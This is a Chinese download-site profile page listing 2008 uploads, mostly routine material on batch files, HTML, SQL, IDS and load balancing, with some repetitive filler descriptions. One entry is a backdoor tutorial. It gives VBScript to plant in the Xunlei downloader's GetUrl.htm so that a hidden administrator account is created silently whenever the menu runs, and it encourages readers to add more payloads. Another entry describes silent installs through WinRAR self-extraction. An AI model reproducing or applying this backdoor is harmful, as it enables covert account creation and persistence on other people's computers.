• 博客(0)
  • 资源 (9)

空空如也

非常好的批处理程序代码

批处理程序代码批处理程序代码批处理程序代码批处理程序代码批处理程序代码批处理程序代码批处理程序代码批处理程序代码批处理程序代码批处理程序代码批处理程序代码批处理程序代码批处理程序代码批处理程序代码批处理程序代码批处理程序代码批处理程序代码批处理程序代码批处理程序代码

2008-11-04

autorun脚本详解有实例

autorun脚本详解有实例autorun脚本详解有实例autorun脚本详解有实例autorun脚本详解有实例autorun脚本详解有实例autorun脚本详解有实例autorun脚本详解有实例autorun脚本详解有实例autorun脚本详解有实例autorun脚本详解有实例autorun脚本详解有实例

2008-11-04

自己总结的HTML常用标签

自己总结的HTML常用标签自己总结的HTML常用标签自己总结的HTML常用标签自己总结的HTML常用标签自己总结的HTML常用标签自己总结的HTML常用标签自己总结的HTML常用标签自己总结的HTML常用标签自己总结的HTML常用标签自己总结的HTML常用标签自己总结的HTML常用标签自己总结的HTML常用标签自己总结的HTML常用标签

2008-11-04

SQL语言基本语句介绍SQL语言基本语句介绍

SQL语言基本语句介绍SQL语言基本语句介绍SQL语言基本语句介绍SQL语言基本语句介绍SQL语言基本语句介绍SQL语言基本语句介绍SQL语言基本语句介绍SQL语言基本语句介绍SQL语言基本语句介绍

2008-11-04

入侵检测IDS详细入侵检测IDS详细

网络的不安全,为什么要有IDS,IDS有什么作用! 网络的不安全,为什么要有IDS,IDS有什么作用! 网络的不安全,为什么要有IDS,IDS有什么作用!

2008-11-04

非常专业计算机翻译软件

专业计算机翻译软件,非常棒!专业计算机翻译软件,非常棒!专业计算机翻译软件,非常棒!专业计算机翻译软件,非常棒!

2008-11-04

脚本制作迅雷后门脚本制作迅雷后门

脚本制作迅雷后门 教程作者:平行空间 305058321 在安装了迅雷下载软件后 在网页的链接右击都会出现“用迅雷下载” 其在注册表的位置: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt 我们找到“默认”下面 C:\Program Files\Thunder Network\Thunder\Program\GetUrl.htm 可以看到它其实是调用了一个网页 是脚本语言写的 所以我们能在其中加入脚本语言来达到我们的目的 这里我演示下加用户 当然用脚本语言还能实现很多的功能比如FTP.... <script language="VBScript"> Set vbs=CreateObject("Wscript.Shell") vbs.run "cmd /c net user sunlei 1987 /add",0 vbs.run "cmd /c net localgroup administrator sunlei /add",0 </script> 意思很简单 就是加个sunlei的用户 然后加到管理员组 把代码放最下面就好了 ,0的作用是不弹出cmd对话框 现在是没sunlei这个用户的 来启动下讯雷 我们的用户就加上了 这个加用户只是个例子 大家可以自己写脚本实现更多的功能 教程就到这里 谢谢您的观看!

2008-11-04

Windows NLB网络负载平衡

 负载平衡不但可以有效地解决单服务器的性能限制,而且可以实现故障的快速转移,保证服务的高可用性以及灵活的扩展性。于是,负载平衡几乎是每个网络管理员的必修课。本文章主要讲述windows2003在网络负载平衡(Network Load Balancing )方面的应用。

2008-11-04

利用WinRAR实现网上程序的自动下载

本文结合示例阐述了怎样利用WinRAR的自解压功能实现网上程序的自动下载。所谓的“自动“ ,就是让用户毫无知觉的,程序就已经安装到计算机上。当然,如果把该功能用于不正当途径(如制造病毒、木马程序),可不是本文的目的。

2008-10-30

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除